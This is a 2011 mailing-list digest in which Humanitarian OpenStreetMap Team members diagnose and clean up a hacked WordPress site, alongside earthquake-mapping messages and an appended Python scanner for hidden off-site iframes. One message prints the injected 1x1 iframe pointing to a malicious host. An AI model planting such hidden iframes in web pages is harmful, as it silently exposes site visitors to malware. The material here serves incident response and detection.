[HOT] Theme Hacked
Om Goeckermann
om.imap at gmail.com
Tue Oct 25 07:08:29 BST 2011
Theme Template files are directly editable from within the Admin interface. Easily.
Sent from my phone.
May contain incom
plete thoughts.
On Oct 24, 2011, at 19:44, hot-request at openstreetmap.org wrote:
> Today's Topics:
>
> 1. Re: Malware on hot.openstreetmap.org (Harry Wood)
> 2. Passwords/Access on HOT Equipment (Kate Chapman)
> 3. Re: Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY 38.6
> 43.5(378fb) (Shu Higashi)
> 4. Re: Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY 38.6
> 43.5(378fb) (Pierre Béland)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Mon, 24 Oct 2011 11:23:52 -0700 (PDT)
> From: Harry Wood <mail at harrywood.co.uk>
> To: Rodolphe Quiedeville <rodolphe at quiedeville.org>, Kate Chapman
> <kate at maploser.com>
> Cc: "hot at openstreetmap.org" <hot at openstreetmap.org>
> Subject: Re: [HOT] Malware on hot.openstreetmap.org
> Message-ID:
> <1319480632.99218.YahooMailNeo at web160320.mail.bf1.yahoo.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> FIXED!
>
> ...or at least I have been able to remove the iframe from the index file which Rodolphe identified earlier (thanks for that, Rodolphe). I also removed the Google Analytics bit from there. Wasn't sure if that was part of the attack or not, but I'm sure we can live without it for the moment. I haven't been able to take any other steps to check for malware or secure it better. If anyone can identify anything urgent I should be doing on there, let me know. I can run commands on there (via a PHP script as a WP plugin), ...however anything complicated is going to be a lot easier when Mikel is back with his SSH access.
>
>
> Harry Wood
>
>
>
> ________________________________
> From: Rodolphe Quiedeville <rodolphe at quiedeville.org>
> To: Kate Chapman <kate at maploser.com>
> Cc: hot at openstreetmap.org
> Sent: Monday, 24 October 2011, 7:36
> Subject: Re: [HOT] Malware on hot.openstreetmap.org
>
> On 24/10/2011 08:28, Kate Chapman wrote:
>> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
>> missing something.
>
> The iframe is not on the /weblog/ pages; you can see it when you call the
> root URL like this:
>
>
> rodo at elz:~$ curl hot.openstreetmap.org
> <html>
> <head>
> <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
> </head>
> <body><iframe
> src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
> width="1" height="1"></iframe>
> <script type="text/javascript">
> var gaJsHost = (("https:" == document.location.protocol) ?
> "https://ssl." : "http://www.");
> document.write(unescape("%3Cscript src='" + gaJsHost +
> "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
> </script>
> <script type="text/javascript">
> var pageTracker = _gat._getTracker("UA-5963453-1");
> pageTracker._trackPageview();
> </script>
> </body>
> </html>
>
> Have a look at the beginning of body part
>
> It's probably not in the theme part of Wordpress, but somewhere in the
> config parts of the blog.
>
> Regards
>
>
>
>>
>> -Kate
>>
>> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
>> <rodolphe at quiedeville.org> wrote:
>>> Hi,
>>>
>>> Someone cracked the WordPress installed on hot.openstreetmap.org and added
>>> an iframe to:
>>>
>>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
>>>
>>> Edit the WordPress template, remove this iframe and it could resolve
>>> the problem. The security alert occurs on Firefox too.
>>>
>>> Regards
>>>
>>>
>>> On 23/10/2011 23:33, Kate Chapman wrote:
>>>> Hi Floris,
>>>>
>>>> Yes, I know about the problem but haven't been able to fix it. I think
>>>> logging into the server might be necessary, but I think only Mikel has
>>>> access.
>>>>
>>>> If anyone has other suggestions please help.
>>>>
>>>> Kate
>>>>
>>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu> wrote:
>>>>
>>>>     I'm getting warnings from Chrome at the moment that
>>>>     hot.openstreetmap.org is infected
>>>>     with malware.
>>>>
>>>>     Anybody want to look into that?
>>>>
>>>>     Here's the google diagnose page for it:
>>>>
>>>>     http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
>>>>
>>>>     Greetings,
>>>>     Floris Looijesteijn
>>>>
>>>>     (tracing Van, Turkey)
>>>>
>>>>     _______________________________________________
>>>>     HOT mailing list
>>>>     HOT at openstreetmap.org
>>>>     http://lists.openstreetmap.org/listinfo/hot
>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> Rodolphe Quiédeville
>>> http://cartosm.eu - Integration of free maps into websites
>>> Blog : http://blog.rodolphe.quiedeville.org/
>>> SIP/XMPP : rodolphe at quiedeville.org
>>>
>>>
>
>
> --
> Rodolphe Quiédeville
> http://cartosm.eu - Integration of free maps into websites
> Blog : http://blog.rodolphe.quiedeville.org/
> SIP/XMPP : rodolphe at quiedeville.org
>
>
> ------------------------------
>
> Message: 2
> Date: Mon, 24 Oct 2011 11:31:41 -0700
> From: Kate Chapman <kate at maploser.com>
> To: Aaron Huslage <huslage at gmail.com>
> Cc: "HOT at OSM \(Humanitarian OpenStreetMap Team\)"
> <hot at openstreetmap.org>
> Subject: [HOT] Passwords/Access on HOT Equipment
> Message-ID:
> <CAGn7mOrVPdvv7ph3kW6OFQZMu99RjO0sYfGxX-vd_7kfzvAXag at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Nobody is sharing passwords on these sites. The HOT servers all
> require everyone to use their own SSH keys. On the blog everyone has
> their own account.
>
> -Kate
>
> On Mon, Oct 24, 2011 at 10:59 AM, Aaron Huslage <huslage at gmail.com> wrote:
>> Any blog user should have their own account with the privileges they
>> need. We should delete the admin account and only use personal
>> accounts. Not everyone needs to be admin!
>>
>> --
>> Aaron Huslage
>> sent via mobile device
>>
>> On Oct 24, 2011, at 12:58 PM, "Jaakko Helleranta.com"
>> <jaakko at helleranta.com> wrote:
>>
>>> LastPass allows sharing of passwords to individual users' LastPass accounts.
>>> I bet there is a range of opinions here about any use of password vaults, perhaps especially proprietary (albeit free) services. My own opinion is that it could be a good solution also for HOT's pwd mgmt.
>>> Cheers,
>>> -Jaakko
>>>
>>> Sent from my BlackBerry® device from Digicel
>>> --
>>> Mobile: +509-37-26 91 54, Skype/GoogleTalk: jhelleranta
>>>
>>> -----Original Message-----
>>> From: Harry Wood <mail at harrywood.co.uk>
>>> Date: Mon, 24 Oct 2011 09:23:50
>>> To: Kate Chapman<kate at maploser.com>; hot at openstreetmap.org<hot at openstreetmap.org>; ingenieroariel at gmail.com<ingenieroariel at gmail.com>
>>> Reply-To: Harry Wood <mail at harrywood.co.uk>
>>> Subject: Re: [HOT] Malware on hot.openstreetmap.org
>>>
>>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Tue, 25 Oct 2011 07:25:57 +0900
> From: Shu Higashi <s_higash at mua.biglobe.ne.jp>
> To: Pierre Béland <infosbelas-gps at yahoo.fr>
> Cc: HOT Openstreetmap <hot at openstreetmap.org>
> Subject: Re: [HOT] Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY
> 38.6 43.5(378fb)
> Message-ID:
> <CAJPU9VWXRnHHa7GVAG_YOKTS7m50cEGPC4Am4FToZ3ok-yTCPA at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Sorry for my wrong expression.
>
> (1)43.31880, 38.52070
> (2)43.31906 , 38.52067
> (diff) (+0.00026) (-0.00003)
>
> 2011/10/25, Shu Higashi <s_higash at mua.biglobe.ne.jp>:
>> I think the railway line needs an offset.
>>
>> I adjusted the background imagery on Potlatch2 showing GPS log
>> and the offset value at the right side corner of the building was:
>> (1)43.31880->43.31906 (+0.00026)
>> (2)38.52070->38.52067 (-0.00003)
>>
>> See attached file.
>>
>> Shu Higashi
>>
>> 2011/10/25, Pierre Béland <infosbelas-gps at yahoo.fr>:
>>> I also mapped without offset. But looking at a railway crossing Van (way
>>> id='15434974'), it looks better without offset. Look in particular in the
>>> harbour beside the lake. It is indicated in the changeset that it has
>>> been
>>> traced by GPS (see
>>> http://www.openstreetmap.org/browse/changeset/9133478).
>>>
>>> There are reports that the town of Ercis (lat=39.02837&lon=43.3593), north
>>> of Van lake, also has damage. Many isolated villages could also have
>>> damage. It would be good to obtain more detailed satellite imagery for
>>> the region.
>>>
>>> Pierre Béland
>>>
>>
>
>
>
> ------------------------------
>
> Message: 4
> Date: Mon, 24 Oct 2011 19:43:52 -0400
> From: Pierre Béland <infosbelas-gps at yahoo.fr>
> To: "HOT Openstreetmap" <hot at openstreetmap.org>
> Subject: Re: [HOT] Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY
> 38.6 43.5(378fb)
> Message-ID: <201110241943511878605 at yahoo.fr>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Higashi showed on 2011-10-24 18:20:19
> a map of the railway line in Van from Potlatch2.
>
> Without applying any offset to the Bing Imagery, I obtain a different map in both Potlatch2 and JOSM. The roads, the railway and the building over the railway are apparently properly aligned.
>
> See map from Potlatch2 at the following URL: http://pierzen.dev.openstreetmap.org/hot/railway-van-turkey.jpg
>
>
> Pierre Béland
>
> ------------------------------
>
>
>
> End of HOT Digest, Vol 20, Issue 16
> ***********************************
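The check done by eye on the `curl` output in the quoted thread, as an added example that is not part of the original messages: a Python scan that reports iframes which are both off-site and effectively invisible (1x1 or hidden by style). The sample page, the host names and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def _tiny(value):
    """True for width/height values such as "0", "1" or "1px"."""
    digits = (value or "").strip().lower().replace("px", "")
    return digits.isdigit() and int(digits) <= 1

class IframeAudit(HTMLParser):
    """Collects iframes that load from another host and cannot be seen."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        # Relative URLs have no host; subdomains of the site count as on-site.
        off_site = (bool(host) and host != self.site_host
                    and not host.endswith("." + self.site_host))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        if off_site and hidden:
            self.findings.append({"host": host, "line": self.getpos()[0]})

def find_hidden_offsite_iframes(html, site_host):
    parser = IframeAudit(site_host)
    parser.feed(html)
    return parser.findings

# Constructed sample modelled on the root page shown in the thread.
SAMPLE_ROOT_PAGE = """<html>
<head><META HTTP-EQUIV="refresh" content="0;URL=/weblog"></head>
<body><iframe
src="http://injected.example/showthread.php?t=1"
width="1" height="1"></iframe>
<iframe src="/weblog/embed" width="600" height="400"></iframe>
<iframe src="http://maps.example.net/widget" width="600" height="400"></iframe>
</body>
</html>"""

if __name__ == "__main__":
    for hit in find_hidden_offsite_iframes(SAMPLE_ROOT_PAGE, "hot.example.org"):
        print("hidden off-site iframe:", hit)
```

Run it against the site root as well as the blog pages, since in this incident the iframe was only in the root index file and not under /weblog/.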